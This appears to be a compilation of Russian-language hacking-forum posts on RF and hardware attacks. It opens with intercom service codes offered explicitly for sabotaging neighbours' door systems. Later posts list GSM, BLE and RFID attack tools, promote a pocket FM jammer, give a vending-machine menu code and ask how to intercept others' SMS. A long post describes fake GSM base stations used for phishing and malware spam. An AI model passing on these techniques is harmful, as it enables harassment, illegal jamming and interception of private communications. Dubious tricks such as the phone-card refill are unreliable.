Вообщем я не раз встречался в инете с инструкциями по эксплуатации и настройке домофонов. Оказывается с их помощью можно наделать кучу гадостей соседям или жильцам этого подъезда. Итак, начнем. Нашей целью будет домофон фирмы Rainmann. Эти домофоны немного дешевле всех своих аналогов, поэтому стоят почти везде...

Хакнуть домофон просто:
набираем "КЛЮЧ" и 987654. Услышим двойной звуковой сигнал. Затем набирает 123456. На дисплее появляется буква "P". Все. теперь домофон в нашей власти. Осталось научиться им управлять.
Итак что можно ввести:
1 - расширенная настройка домофона. Нажал и отвали подальше за столб и наслаждайся результатом. После первой попытки в родной подъезд любой дилез загадит систему кодов квартир так, что номера и коды собьются и люди будут звонитиь и попадать не туду куда надо.
2 - Обычная настройка домофона. Тут ты его настраивать будешь вплоть до приезда ментов. Так что лучше не трогай.
3 - Подача сигнала
4 - Блокировка двери на 30 сек
8 - открытие двери

Все, пипец жильцам. Желаю удачи поиздеваться над соседями (Слава богу у меня домофон другой иарки)

Тут я предлагаю размещать инфу о вскрытии дверных замков, открытии дверей итд.
Виды замков, отмычки, двери итд.

Вообщем у кого есть идеи-пишите. Можно швыряться линками и постить статьи. Кладем что знаем :bad: :bad:

Сборная тема, которая будет регулярно обновляться ссылками и наработками в области RF и Аппаратной Безопасности. Фрикинг - очень узкое направление и умирает год от года. С появлением Программного Радио появились и новые возможности, а так же Аппаратный Взлом который развивается семимильными шагами (толи еще будет с IoT). Смело задавайте свои вопросы, буду делиться знаниями, так же не против совместных экспериментов с оборудованием. Знаем - поможем, не знаем - научимся:smile8:

RFSec-ToolKit - это набор Hacktools для протокола радиочастотной связи на платформе GitHub, обновляемые блоги, а также собраные видео реализации атак на YouTube, включая SDR, 2G GSM, 3G, 4G LTE, 5G, NFC & RFID, ZigBee и так далее.

SDR-SoftWare

GQRX: программно определяемый радиоприемник, работающий на GNU Radio и Qt

SDRSharp: Airspy - это популярный и доступный коммуникационный приемник на основе SDR (с программным обеспечением радиосвязи), обладающий высочайшей производительностью и минимальным форм- фактором Это серьезная альтернатива как для чувствительных к стоимости, так и для высокопроизводительных сканеров, в то же время демонстрируя лучший опыт просмотра радиосигналов на рынке благодаря тесной интеграции со стандартным де-факто программным обеспечением SDR #. @ Airspy_com

SDR_Console: SDR-Radio.com - это консоль Windows для программно-определяемых радиоприемников (SDR) и приемопередатчиков. Разработанное для коммерческих, правительственных, любительских радио и сообществ слушателей коротких волн, программное обеспечение предоставляет мощный интерфейс для всех пользователей SDR

HDSDR: - бесплатная программа с программным обеспечением для радио (SDR) для Microsoft Windows 2000 / XP / Vista / 7/8 / 8.1 / 10

CubicSDR: Cross-Platform Software- Defined Radio Application

sdrangel: программное обеспечение SDR Rx / Tx для Airspy, BladeRF, HackRF, LimeSDR, RTL-SDR, SDRplay RSP1 и FunCube

shinysdr: Программное приложение для радиоприемника, построенное на GNU Radio с веб-интерфейсом и плагинами. В разработке пригодный для использования, но неполный. Совместим с RTL-SDR

openwebrx: многопользовательское ПО SDR с открытым исходным кодом и веб-интерфейсом.

luaradio: легкая, встраиваемая программно-определяемая радиосистема, построенная на LuaJIT

qspectrumanalyzer: анализатор спектра для нескольких платформ SDR (графический интерфейс на основе PyQtGraph для soapy_power, hackrf_sweep, rtl_power, rx_power и других серверных частей)

PandwaRF: инструмент радиочастотного анализа с беспроводным приемопередатчиком частотой менее 1 ГГц, управляемый смартфоном

rpitx: РЧ передатчик для Raspberry Pi. rpitx

• это радиопередатчик для Raspberry Pi (B, B, PI2, PI3 и PI zero), который передает RF непосредственно в GPIO. Он может обрабатывать частоты от 5 кГц до 500 МГц

pifm: Включение Raspberry Pi в FM-передатчик

rpidatv: - это цифровой телевизионный передатчик для Raspberry Pi (B, B, PI2, PI3, Pizero), который выводится непосредственно в GPIO

PSDR:PortableSDR - автономный высокочастотный программно-определяемый трансивер

gr-cc11xx: GNU Radio OOT модуль для связи с устройствами на основе TI CC11xx

spektrum: - это программное обеспечение для анализа спектра для использования с rtl-sdr

OpenUSRP: using LimeSDR to simulate USRP B210, OpenUSRP can using LimeSDR to simulate USRP B210 Device

kalibrate-rtl: использование частотного сканера GSM и калькулятора смещения частоты с устройствами rtl-sdr

kalibrate-hackrf: kalibrate for hackrf

kalibrate-bladeRF: kalibrate for bladeRF

GNURadio:GNU Radio is a Free & Open- Source Toolkit for Software Radio GNURadio.org

Universal Radio Hacker: это программа для исследования неизвестных беспроводных протоколов

gr-recipes : главный репозиторий GNU Radio для использования с PyBOMBS

gr-etcetera: в этом хранилище хранятся дополнительные рецепты для GNU Radio

RangeNetworks/dev: набор инструментов, которые делают работу с многочисленными программными компонентами максимально безболезненной

OpenBTS: узел сети радиодоступа GSM GPRS (БС)

YateBTS: представляет собой программную реализацию сети радиодоступа GSM / GPRS на основе Yate и совместима с базовыми сетями GSM / GPRS SS7 MAP и LTE IMS, интегрированными в наш сервер унифицированной базовой сети YateUCN. (БС)

OpenLTE: - это реализация спецификаций LTE 3GPP с открытым исходным кодом. Основное внимание уделяется передаче и приему нисходящей линии связи.

OpenBTS-UMTS: узел сети радиодоступа 3G UMTS

Cellular Infrastructure: это группа программ Osmocom, реализующая компоненты инфраструктуры сотовой сети для GSM, GPRS, EDGE, UMTS, HSPA, LTE и связанных с ними интерфейсов и стеков протоколов. [360 Unicorn Team's Demo](https://osmocom.org/projects/cellular-infrastructure/wiki/Accelerate3g5_ --_unicornteam)

OpenBSC: это проект, направленный на создание свободного программного обеспечения, (A) лицензированных GPL реализаций программного обеспечения для стеков и элементов протокола GSM / 3GPP.

OsmoBTS: - это GSM BTS с открытым исходным кодом (базовая приемопередающая станция) с интерфейсом A-bis / IP

srsLTE: - это бесплатная LTE-библиотека с открытым исходным кодом для SDR UE и eNodeB, разработанная SRS

srsUE: - программное обеспечение LTE UE, разработанное SRS. Он написан на C и основан на библиотеке srsLTE

srsGUI: - бесплатная графическая библиотека с открытым исходным кодом для SDR, использующая Qt и Qwt. Библиотека предоставляет ряд полезных графиков для построения графиков действительных и комплексных чисел

IMDEA-OWL: OWL означает Online Watcher of LTE. imdeaOWL - это бесплатный декодер канала управления LTE с открытым исходным кодом, разработанный IMDEA Networks Institute и основанный на srsLTE, библиотеке LTE для SDR UE и eNodeB, разработанной SRS

OpenAirInterface: OpenAirInterface Software Alliance является некоммерческим консорциумом по разработке экосистемы для разработки программного / аппаратного обеспечения с открытым исходным кодом для базовой сети, а также для сети доступа и пользовательского оборудования (EUTRAN) сотовых сетей 3GPP

OpenAirInterface5G: беспроводная реализация Openairinterface 5G

LTE Base Station Software: позволяет создать настоящую базовую станцию LTE 4G (называемую eNodeB), используя стандартный ПК и недорогой программный интерфейс. Вся обработка на физическом и протокольном уровнях выполняется в режиме реального времени внутри ПК, поэтому не требуется никакого специального оборудования LTE. <https://www.amarisoft.com/products- lte-ue-ots-sdr-pcie/#software>

OsmocomBB: - это реализация программного обеспечения с открытым исходным кодом GSM. Он намерен полностью заменить необходимость в фирменном программном обеспечении GSM в полосе пропускания

gr-gsm: блоки Gnuradio и инструменты для приема GSM-передач

gr-lte: проект gr-lte представляет собой пакет программного обеспечения с открытым исходным кодом, целью которого является обеспечение приемника GNU Radio LTE для приема, синхронизации и декодирования сигналов LTE.

LTE-Cell-Scanner: OpenCL, SDR, TDD/FDD LTE cell scanner, full stack from A/D samples to SIB ASN1 messages decoded in PDSCH, (optimized for RTL-SDR HACKRF and BladeRF board)

gps-sdr-sim: генерирует потоки данных сигнала основной полосы GPS, которые могут быть преобразованы в RF с использованием программно-определяемых радиопередач (SDR), таких как bladeRF, HackRF и USRP

gr-fosphor: блок GNURadio для визуализации спектра с использованием графического процессора

gr-nordic: блок GNU и диссектор Wireshark для протокола Nordic Semiconductor nRF24L Enhanced Shockburst

gr-lora: блок GNU Radio OOT, реализующий LoRa PHY

gr-ieee802-11: приемопередатчик IEEE 802.11 a / g / p для GNU Radio, предназначенный для работы с Ettus N210s и B210s

gr-keyfob: трансивер для беспроводных автомобильных ключей Hella

gr-rds: Приемопередатчик FM RDS / TMC

gr-radar: GNU Radio Radar Toolbox

gr-air-modes: реализует программный радиоприемник для сигналов приемоответчика режима S, включая отчеты ADS-B от оборудованного воздушного судна

gr-ais: Декодер автоматической информационной системы для судовых сообщений о местоположении для проекта Gnuradio

gr-dvbt: реализация DVB-T в gnuradio

spectrum_painter: инструмент для преобразования изображений в потоки IQ, которые выглядят следующим образом при просмотре на графике водопада

gr-paint: OFDM Spectrum Painter для GNU Radio Учебное пособие

gr-baz: Коллекция новых блоков для GNU Radio

Environment Build Tools

HomeBrew missing package manager for macOS

MacPort MacPorts Project is an open-source community initiative to design an easy-to-use system for compiling, installing, and upgrading either command-line

Pybom:PyBOMBS (Python Build Overlay Managed Bundle System) is the new GNU Radio install management system for resolving dependencies and pulling in out-of-tree projects.

RFSignal Reverse Tools

Audacity: Audacity® is free, open source, cross-platform audio software for multi-track recording and editing

Baudline: это частотно-временной браузер, разработанный для научной визуализации спектральной области. Анализ сигналов выполняется с помощью Фурье, корреляции и растровых преобразований, которые создают красочные спектрограммы с яркими деталями

Inspectrum: - это инструмент для анализа захваченных сигналов, в основном от программно-определяемых радиоприемников

Dspectrum: Автоматический анализ сигналов RF / SDR [обратный инжиниринг]

rtl_433: Приложение, использующее librtlsdr для декодирования температуры с беспроводного датчика температуры

ooktools: инструменты включения и выключения для вашей SD-arrrR leonjza.github.io

TemperestSDR: репозиторий gr- temperest.

YouTuBe Video Tutorial

Sylvain Munaut: osmo-gmr: What's up with sat-phones ?

DeepSec 2010 OsmocomBB A tool for GSM protocol level security analysis of GSM networks

DeepSec 2010: Targeted DOS Attack and various fun with GSM Um by Sylvain Munaut

UnicornTeam of Ir0nSmith http://v.qq.com/vplus/9427cc31bad2413591069f1800862a96

Roberto Nóbrega: Michael Ossmann Software Defined Radio with HackRF )https://www.youtube.com/user/liquen17/playlists

Hardware Hacking By Samy Kamkar https://www.youtube.com/user/s4myk

GNURadio: GRCon [https://www.youtube.com/channel/UCceoapZVEDCQ4s8y16M7Fng] (https://www.youtube.com/channel/UCceoapZVEDCQ4s8y16M7Fng)

Balint256:GNU Radio Tutorial Series、Cyberspectrumhttps://www.youtube.com/user/balint256

Crazy Danish Hacker: https://www.youtube.com/channel/UClg0eyJTbAZaYuz3mhwfBBQ/playlists

Ettusresearch https://www.youtube.com/user/ettusresearch/feed

Anders Brownworth Well Tempered HackerOpenBTS https://www.youtube.com/playlist?list=PL892EE6BB9D10192F

Gareth's SDR Tutorial https://www.youtube.com/channel/UCYJO5ecRhbWARNcsDIFffPg

Software Defined Radio Academy https://www.youtube.com/channel/UC1GAlgAQrkjeeLmIkCB8pgQ

雪碧 0xroot's SDR Hacking https://www.youtube.com/channel/UCVc4stniRjRfOi1eY-0Ij2Q

Radio Hacking: Cars, Hardware, and more! - Samy Kamkar - AppSec California 2016

26C3: Using OpenBSC for fuzzing of GSM handsets

27c3: SMS-o-Death

27c3: Wideband GSM Sniffing

28c3: Introducing Osmo-GMR

29C3: Further hacks on the Calypso platform

[FOSDEM 2014] osmocom: Overview of our SDR projects

Twitter &WEB Site

@rtlsdrblog [RTL-SDR.com](http://rtl- sdr.com)

Wireless frequency bands: Frequency / Arfcn caculator for LTE, UMTS, GSM and CDMA, and Carrier Aggregation combination info

@scateu HackRF.NET

@AndrewMohawk andrewmohawk.com

@bastibl bastibl.net

@csete OZ9AEC Website

@samykamkar Samy Kamkar

@cn0Xroot cn0xroot.com spriteking.com

@fairwaves fairwaves

@gareth__ Gareth codes

@mpeg4codec ICE9 Blog

@marcnewlin Marc Newlin

@drmpegW6RZ

@CrazyDaneHacker Crazy Danish Hacker

jxjputaoshuJiao Xianjun (BH1RXH)'s tech blog

@bastillenet Bastille

@embeddedsec

@RadioHacking

@elasticninja

@devnulling

@uber_security

@TresActon

@Kevin2600

@BE_Satcom

@lucasteske

@giorgiofox

@xdzou

@090h

@rfspace

@mobios

@lambdaprog

@Marcus Mengs

@Azeria

@WHID Injector

@B1N2H3X

Ruten.proteus

NFC &RFID Resources
HardWare

ProxMark3: - это мощный RFID- инструмент общего назначения, размером с колоду карт, предназначенный для отслеживания, прослушивания и эмуляции всего - от низкочастотных (125 кГц) до высокочастотных (13,56 МГц) меток

ACR122U

SoftWare

miguelbalboa/rfid: библиотека Arduino для MFRC522 и других модулей на основе RFID RC522

RFIDIOt: библиотека и инструменты Python RFID / NFC

RFIDler:RFIDler - программно- определяемый считыватель / запись / эмулятор RFID (LF)

Tutorial

cn0xroot.com

FreeBuf.com

BLE Resources
HardWare

Ubertooth: поставляется с анализатором BLE (Bluetooth Smart) и может прослушивать некоторые данные из соединений Bluetooth Classic Rate (BR) Classic

TI CC2540: - это экономичная, энергосберегающая настоящая система на кристалле (SoC) для приложений с низким энергопотреблением Bluetooth
Программного обеспечения

SoftWare

TI PACKET-SNIFFER: - это программное приложение для ПК, которое может отображать и хранить радиопакеты, захваченные RF-устройством прослушивания. Устройство захвата подключается к ПК через USB. Различные протоколы. http://www.ti.com/tool/packet-sniffer

libbtbb: библиотека декодировани Bluetooth

crackle: использует уязвимость в процессе сопряжения BLE, которая позволяет злоумышленнику угадать или очень быстро перебить TK (временный ключ). С помощью TK и других данных, собранных в процессе сопряжения, можно собрать STK (краткосрочный ключ) и позднее LTK (долгосрочный ключ).

spectool: - это набор утилит для использования различного оборудования анализатора спектра. Он поддерживает набор устройств Wi-Spy (оригинальные, 24x, 24x2, DBX, DBX2, 900, 24i) от Metageek LLC и Ubertooth. В состав Spectools входят драйверы пользовательского пространства для самого оборудования, графический пользовательский интерфейс GTK и Cairo, сетевые протоколы для захвата удаленных устройств и простые утилиты для разработки дополнительных инструментов.

spectool-web: веб-просмотрщик для данных спектра WiSPY и Ubertooth

[gatttool](http://www.jaredwolff.com/blog/get-started-with-bluetooth-low- energy): Get Started with Bluetooth Low Energy on Linux

hcitool: используется для настройки Bluetooth-соединений и отправки специальной команды на устройства Bluetooth

BLE-Security: скрипты взлома дверей Bluetooth, которые требуют Ubertooth или других устройства

BLESuite: то пакет Python, который предоставляет более простой способ тестирования устройства Bluetooth с низким энергопотреблением (BLE) (группа NCC)

BLESuite-CLI: инструмент командной строки, позволяющий упростить тестирование устройств Bluetooth с низким энергопотреблением (BLE)

BLE-Replay: инструмент оценки периферийных устройств Bluetooth с низким энергопотреблением (BLE)

Blue-Hydra Служба обнаружения устройств Bluetooth Blue-Hydra, созданная поверх библиотеки bluez. BlueHydra использует ubertooth, где это возможно, и пытается отслеживать как классические, так и низкоэнергетические (LE) устройства Bluetooth с течением времени

BTLEJuice: это полноценная платформа для выполнения атак «человек посередине» на интеллектуальные устройства Bluetooth (также известные как Bluetooth Low Energy).

wireshark: самый популярный в мире анализатор сетевых протоколов.

Tutorial

[BLE Hacking：ble scan and sniffer withu bertooth- one](https://cn0xroot.com/2016/06/12/ble-hacking%EF%BC%9Able-scan-and-sniffer- withubertooth-one/)

[Ubertooth – Bluetooth Sniffing Updated for 2014](https://penturalabs.wordpress.com/2014/02/20/ubertooth-updated- for-2014/)

[Spectrum Tools and Ubertooth One](https://hackerific.net/2012/01/28/Spectrum- Tools-and-Ubertooth-One/)

BLE Fun With Ubertooth: Sniffing Bluetooth Smart and Cracking Its Crypto

[Ubertooth Spectrum Analysis (Kali/Chromebook)](https://www.splitbits.com/2014/05/14/ubertooth-spectools- chromebook/)

[Sniffing/logging your own Android Bluetooth traffic](http://stackoverflow.com/questions/23877761/sniffing-logging-your- own-android-bluetooth-traffic)

[Installing the Ubertooth One on BT5](http://www.backtrack- linux.org/forums/showthread.php?t=41552)

#Thanks

Axilirator

@vileer_com

@cn0Xroot:smile12::smile12::smile12:

как можно ламонуть аппараты оплаты сотовой связи. а?
и вообще воз можно ли?
:help:

FM-киллер - устройство в кармане

Арт-группа "Куда бегут собаки" (Екатеринбург) сегодня продемонстрировала в действии свой сенсационный авторский артдевайс - карманную глушилку для FM- диапазона. Незаменима в такси, кафе и прочих публичных российских местах. Себестоимость устройства - 10 долларов.

​

Подробности об устройстве - под катом.

Проект «Антишансон».

«Антишансон» – индивидуальное мобильное устройство для защиты и активного противодействия вмешательству нежелательной информации из радио-эфира (ПМРГ- персональная мобильная радио-глушилка ). Позволяет незаметно глушить выбранную радиочастоту, путем создания гармонической радиопомехи в заданном диапазоне. Устройство имеет кнопку включения радиопомехи «ВЫКЛ FM» и ручку подстройки частоты.

​

Тактико-технические характеристики.

Диапазон частот: 88-108МГц (FM)
Радиус действия: 5-10м
Напряжение питания: 9V
Время непрерывной работы: 15 часов.
Габаритные размеры: 35х50х25

Демонстрация АНТИ-ШАНСОНА проходила 10 июня 2006 на завершении Летнего лагеря художников в Айзпуте, Латвия.

10lab [at] mail.ru Алексей Корзухин

ой​

У нас в городе везде понатыканы всякие автоматы с жопа - колой. Мне в башку даже не приходило что их можно обмануть, однако в апрельском Хакере а рубрике HACQ FAQ написано что типа это возможно.
Теоритически есть следующий код для попадания в меню автомата: набираем 4-2-3-1 на передней панели и таким образом попадаем в меню. Первая клавиша - верхняя. Далее попав в меню можно выбрать:
- Cash (Кол-во накопленного кэша в аппарате)
- Sale (Скока напитков продано)
- VER (Версия ПО)
- EXTRAS (Тут статистика типа температуры и т.д.)
- ERROR (Инфа об ошибках автомата)

А собственно как достать водичку - там не написано. если кто узнает - пишите.
Чтото типа "Расфигачить автомат динамитом или кувалдой" не принимаются.
Жду умных мыслей.

Кто знает как осуществить перехват поделитесь!

Ехал в такси недавно, это было весело, кто то на частоте таксишной радиостанции прикалывался... его все таксисты и диспетчеры лают, обещают вычислить а он еще больше шумит )
Мне вот интересно, реально вообще такого шутника вычислить?

думаю из названия темы догадались че мне надо
З.Ы. над друзьями поугарать охота

Предлагаю собирать тут интересные "хакерские" устройства, их сейчас великое множество, не только правильно собранный Raspberry Pi с PwnPi на борту
давайте делиться линками и коротким описанием

Можно ли расширить както радиус приёма вайфай сетей ? Не усиливая саму точку, а намутя чтото с приёмником\ми.

мне срочно нужна помощь. дело в том что мне надо перехватить чужие СМС сообщения.как это можно сделать,если вообще реально? я живу в Латвии и мне надо сообщения операторов LMT и TELE2. Заранее спасибо

Итак, прошла следующая инфа:
можно 2 раза юзать телефонные карты с чипом.
Для этого потребуется карточка с каким либо кол-вом единиц.
Используем ее чтоб осталось 1 единица. Далее прикрепляем скотчем к телику на 2-3 дня. Восстанавливается около 50% единиц.
Дерзайте.

Шпионаж через анализ излучения монитора

Методы кражи пароля через анализ излучения монитора существуют.

В пример приводилось видео, где звук, генерируемый изображением монитора, принимался на радиоприемник. Я нашел оригинал демонстрации и предлагаю вам познакомиться с ним. Автор в своем видео подробно и понятно излагает технические детали атаки, и нет никакого смысла дублировать их в тексте.

Есть некоторые нюансы, на которые я хочу обратить ваше внимание. Технология сбора данных на основе анализа излучения монитора при хорошем оборудовании позволяет следить за активностью на компьютере жертвы на расстоянии, например, следить за соседями. Атакующий при помощи данного метода может распознать на компьютере жертвы такую активность, как просмотр материалов для взрослых, просмотр футбольного матча или запуск компьютерной игры.

Этим способом можно получить данные для дальнейшей атаки, например: версию операционной системы, используемые программы и посещаемые сайты. Анализируя поведение жертвы, можно оценить степень ее компетентности.

Но качество существующих решений не позволяет таким образом читать переписки или красть пароли, даже если они записаны в текстовом документе. Исключение составляют пароли, записанные в документе огромным шрифтом, но это, скорее, исключение.

Вот скриншот автора видео. Как вы видите, качество достаточно, чтобы понять, чем занят пользователь, но недостаточно, чтобы прочесть его переписки.

Так или иначе, вам стоит знать и помнить о данной атаке. Защита от нее – это вопрос создания радиопомех, и он лежит вне курса. При желании на тематических форумах и сайтах вы найдете подробные инструкции.

(с) cyberyozh

Собстенно сабж. Иногда проходишь мимо такого робота и колы хочеться да и нахаляву.Правда иногда бывает даешь автомату деньги, а он тебе ни колы ни денег. Колы все таки попить хочеться, а воровать из супермаркета не прилично)

Нет ли у кого прошивки GrabOS под пандору, либо 2.5
Могу поделиться 2.4
В принципе есть разные версии под несколько типов авто брелков.

Решил собрать новую версию эмулятора базовой станции.
Фотографии буду выкладывать в процессе сборки. Может кто увидит что-то полезное для себя )

На фото, слева направо
1( высокооборотистые вентиляторы системы охлаждения (суммарное тепловыделение системы около киловатта)
2) СВЧ усилитель
3( настраиваемый антенный фильтр на объемных резонаторах
4) в маленькой алюминиевой коробке-
предусилители приемника (LNA);
предусилители передатчика;
управляемые аттенюаторы как на приемные каналы, так и на передающие;
селективные программно-управляемые полосовые фильтры;
2 управляемых ферритовых фазовращателя;
защитные цепи;
5)сверху всей конструкции - 2 SDR'a , немного модифицированные по ВЧ части и с сильно модифицированной прошивкой их ПЛИС (FPGA)

Update:
Обновление проекта, спустя год - в этом сообщении.

где скачать на телефон root права

Этот прибор реально вмещается в коробочку, объемом меньшим , чем спичечный коробок. Также присутствует вход для наушников, кнопочка для включения прибора.
Так вот мой одногруппник ***** его так :angry2: может прослушивать разговор людей (2-х например) на расстоянии где-то 15 метров.
Я хотел узнать хоть-что у своего одногруппника но он оказался полным :shit:
Может у кого из форумчан есть схемы или вообще хоть какая-нить инфа , о том как можно сделать такое устройство?

Не знаю можно ли критиковать в продажных темах, но все же напишу.
Очень много букв и часть, увы не будет соответстввовать действительности и реалиям
Хотя, без сомнений, что часть из описанного будет работать и предоставлять некоторый уровень защиты.
Видел это описание много лет назад на тематических форумах и другие инженерные решения авторов и в них было много чего инновативного и полезного, но это далеко не панацея, особенно в следствии эволюции сетей связи )
Вы далеко не о всех аспектах работы операторов и СОРМа в курсе ))
Ниже несколько вопросов для размышлений.
1. Предположим о получении сайлентсмс с нестандартным pid (вроде так называется), ваша балалайка с некоторой долей вероятности и предупредит (хоть какая-то защита от примитивных кетчеров)).
А если я прошаренный злоумышленник и у меня есть реальный имси жертвы (откуда в рамках данного обсуждения неважно, кто в теме, тот знает) , то мне абсолютно не надо извращаться и слать жертве "нулевые" смски. Каков толк с этого девайса в таком случае?
2. Каким образом Ваш телефон защитит от ss7 атак? Покажет, что по имси симкарты в телефоне отправлялись мап запросы?? )))
3. Каким образом Ваш телефон защитит от СОРМа?
4. по поводу имея и классмарка, почитал етси, вот не уверен, что кто-то в операторов сейчас оперирует понятием классмарк. но спорить не буду, описано красиво, стандартам соответствует.

Давно есть в планах закупить в личную лабу немножко урана и плутония, для использования сугубо в мирных целях. Начал я поиски естественно в интернете - чтобы заказать с доставкой на дом, ибо свинцовые контейнеры слишком тяжелы для "самовывоза".
Но увы - куки браузера оказались давно отравлены моим паталогическим интересом к GSMу, и EBAY на запрос "уран купить " выдал мне это:

URAN-1 Kit - 52Mhz USRP based OpenBTS SDR GSM Base Station
​

USRP за 100$ ? Адаптивные алгоритмы ебея взломали мой мозг, личная жаба, контролирующая бюджет на всякие ненужные железки - улетела в unhandled exception error и кнопка "Buy It now" была нажата.

Пока посылка телепортировалась силами добра в страну вечных ссанкций, у меня было достаточно времени изучить конструкцию и предлагаемый софт.

Небольшой экскурс в историю. У китайцев одно время был очень популярен SMS спам с фейковых базовых станций. Суть такая - дроп покупает БСку примерно за 2000$, ставит ее на машину или мопед (под сиденье) и катается с ней по городу. За это дропу платят примерно 300$ каждый рабочий день. БСка подключена к интернету и в нее "снаружи" через RDP можно загружать рекламные тексты, которые рассылаются через GSM сеть в радиусе 500м-1км вокруг дропа-БСконосца.
Так как отправка сообщений идет естественно мимо оператора, напрямую в телефон

• то

1. СМС бесплатны
2. оператор не может блочить спам и вообще не при делах
3. владелец БС может подставлять абсолютно любое имя отправителя. Хоть SuperChinaBank , хоть 666, Mom, да что угодно.

Сначала данная тема раскручивалась туго и со скрипом. БСки покупали в основном владельцы небольших магазинов и ресторанчиков, чтобы уведомлять проходивших мимо "потенциальных покупателей" - о своем существовании, а так же акциях, скидках и прочем рекламном дерьме.

Потом видимо о прелестях "прямого" смс спама узнала темная сторона китайского мира - и в ход пошел фишинг, скам, отправка ссылок на малварь от имени банков. Количество дропов-БСконосцев в сети рассылки спама достигло нескольких тысяч, а телефоны стали просто взрываться от количества СМСок - они приходили сотнями в день! И это никак не блокировалось, в том числе средствами телефона (о да, есть такой особый формат смс который вызывает алерт даже у телефона в silent режиме). Дропы не всегда знали что рассылают - текст в большинстве случае подгружался "снаружи" через "удаленный рабочий стол".
На фото ниже - комплект для автомобиля. Были еще маленькие, для скутеров и велосипедов - если найду фотку, прикреплю сюда. Серая коробка под ноутом - БСка. Телефон - включается в режим netmonitor и показывает частоту на которую нужно настроить БСку ее владельцу/дропу.

В итоге спустя недолгое время через эту сеть фейковых БСок стали рассылать банкботов. Естественно, посыпались жалобы от банков в огромном количестве - это не могли не заметить мусора и лавочку довольно быстро прикрыли. Поймали 1500 дропов возивших БСки и закрыли производство "железа" - фирмы занимающиеся массовой смс рекламой, существовали легально и были официально зарегистрированы !

//на фото выше - китайский мент немножко охуевлён толщиной антенного кабеля )) 1/4 superflex джампер однако, я бы тоже наверно охуел если бы сам такой не использовал.

Удивительно, что данное природное явление с СМС спамом через фейковые БС наблюдалось только в Китае. Думаю, рано или поздно подобная тема "стрельнет" где-нибудь в Европе или СНГ/РУ, уверен что это лишь вопрос времени. Слишком уж много возможностей для распространения малвари дает...

Собственно - причем тут уран и китайцы? А все очень просто. Когда им понадобилось сделать 1500шт+ базовых станций - стало ясно, что использовать "оригинальные" USRP для данной задачи - слишком дорого, да и не выпускают их в таком количестве. Поэтому умельцы быстренько скопировали схемотехнику самого старого, простейшего USRP1 и развернули производство этих плат. Так появился URAN-1 , на основе которого и были собраны те тысячи 2G базовых станций, трудившихся на службе грамотных людей, осознавших всю силу GSMа. Собственно, остатки "былой роскоши" после закрытия производств - просочились на ebay в виде всяких URANов, SRAD и прочих поделий.

Фактически - данный девайс - ни что иное как SDR приемопередатчик, полностью совместимый на уровне драйверов с USRP1 (не путать с usrp b200x - это другая история!) и адаптированный к применению в виде бюджетной 2G базовой станции для рассылки спама. В качестве тактового генератора - изначально установлен правильный термокомпенсированный кварц на 52 МГц (у оригинального usrp кварц приходится менять, он там на другую частоту- 64МГц). Каналы TX-RX разнесены на отдельные тракты и разъемы, что облегчает сопряжение платы с усилителем. С выходной мощностью не жадничали - полватта, и похоже что в компактном варианте для скутеристов внешнего усилителя вовсе не было. К "автомобильной" же системе подключался некий доп.модуль на 10...20Вт выходной мощности и дуплексер для объединения RX/TX трактов на одну антенну.

Конструкция предельно проста. Линейный стабилизатор напряжения 5V. ЛИНЕЙНЫЙ! Поэтому он сильно греется и на вход больше 6в подавать нельзя. Микросхема USB 2.0 драйвера. ПЛИСина Altera - печально что не мой любимый Xilinx. JTAG похоже что не выведен, но ПЛИСка шьется через USB, и прошивки для нее есть в интернете. В верилог я не лазил, не хочу заморачиваться с установкой среды разработки под Альтеры, поэтому про возможности прошивки ПЛИС - ничего сказать не могу.
К FPGA подключен фронтенд AD9860 - это SDR , обеспечивающий 8МГц ширину полосы при разрешении 14 бит. Китайцы в спецификации обещают 16 бит, но как всегда - чуда не произошло.
Дальше все по классике USRP. Приемный тракт - квадратурный демодулятор прямого преобразования AD9347, малошумящий усилитель, полосовой фильтр на GSM диапазон.
Передающий тракт - квадратурный модулятор AD8349, синтезатор частоты ADF7360**-3 (важный момент!)** , усилитель RFMD RF3315 - выдающий 0.5вт ВЧ мощности.

Отдельно остановлюсь на нюансе с квадратурным модулятором AD8349 . Дело в том, что они есть разные - AD8349**-1** , AD8349**-2** и так далее. Отличие - рабочая частота. "Троечка" работает в диапазоне от 1600МГц до 1950МГц, то есть как раз закрывает бенд GSM1800.
Логично, что ни на каком другом диапазоне данная плата работать не может. Именно поэтому - при заказе ее с ebay, нужно обязательно указывать, в каком диапазоне вы планируете ее использовать! И ОБЯЗАТЕЛЬНО написать продавцу желаемую частоту.
На плате под 900мгц запаян AD8349**-7** , а в версии 1800МГц AD8349-3 . Почему и зачем так - совершенно не понимаю. Бессмысленно и беспощадно, учитывая что в даташите на AD8349-3 указано - можно включить делитель на 2 и получить заветный 900МГц бенд. Для тестов я себе заказал как раз вариант под 1800, т.к. есть вероятность что подхачив прошивку плисины можно включить режим синтезатора для деления частоты на 2 - и получить возможность работы во всех диапазонах сразу: 1800/900. Но честно сказать мне этим заниматься дико лень, учитывая тот факт что используется альтера
ВЧ часть закрыта добротным литым из алюминия экранирующим кожухом, и оканчивается двумя SMA разъемами. RX и TX соответственно. Плата очень "дубовая" и простая, если что-то сгорит ее элементарно можно отремонтировать, не обладая особыми навыками пайки и даже без микроскопа. Тут нет такой мелочи типа как коммутаторы у HackRFа - все компоненты довольно крупные и с небольшим количеством ног.

Экран для зоны с кварцевым генератором отсутствует. Думаю что если использовать плату в сочетании с внешнем усилителем - экран придется делать самостоятельно, или помещать всю плату целиком в металлический корпус. TCXO- кварц имеет дырочку под отвертку, там нечто переменное (резистор или конденсатор, не всматривался) - вращая его можно подстроить частоту. Конечно, только в том случае - если у Вас завалялся рубидиевый эталон частоты. Если эталона нет - не надо нарушать девственность китайской голограммы, в попытках дефлорировать кварц отверткой. Собьете частоту - софт работать будет, но половина телефонов на БСку не захочет подключаться т.к. вся сетка частот у нее "съедет".
На фото - подобный кварцевый генератор, разобранный. И с голограммой, защищающей регулировочный винт.

Для рассылки спама изначально китайцами использовался модифицированный софт OpenBTS , отголоски этого проекта до сих пор лежат в виде предварительно собранной виртуальной машины на сайте http://kb.iplinkme.com/
Там же есть схемы платы URAN1, т.е. при большом желании ее можно собрать самостоятельно - только стоить это рукоблудие будет намного дороже чем 100$. Проще купить готовую.
Про OpenBTS я подробно писать не буду - обычный эмулятор инфраструктуры оператора, начиная от HLR и заканчивая BSC-BTS-TRX, так называемая NITB - Network In The Box, "сотовая сеть в одной коробке".

